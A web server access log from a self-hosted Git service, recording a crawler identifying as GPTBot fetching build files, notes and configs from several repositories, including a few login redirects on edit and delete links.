"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10526] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10090] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10095] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10094] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13299] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fCMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 25691] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" +[17/Feb/2026:16:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" +[17/Feb/2026:16:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/status.json?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" +[17/Feb/2026:16:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?q=&sort=recentupdate&state=open" [Client 74.7.227.38] [Length 6806] [Gzip 2.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/-/projects" +[17/Feb/2026:16:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md?display=source" [Client 74.7.227.38] [Length 22502] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:16:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?files=C%2b%2bProject" [Client 74.7.227.38] [Length 17456] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" +[17/Feb/2026:16:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14255] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14030] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 14290] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" +[17/Feb/2026:16:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13199] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" +[17/Feb/2026:16:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13230] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" +[17/Feb/2026:16:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13229] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" +[17/Feb/2026:16:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9853] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9853] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13554] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13554] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm" [Client 74.7.227.38] [Length 307675] [Gzip 13.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:16:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11420] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:32:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:32:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 5559] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 17268] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 10001] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11420] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 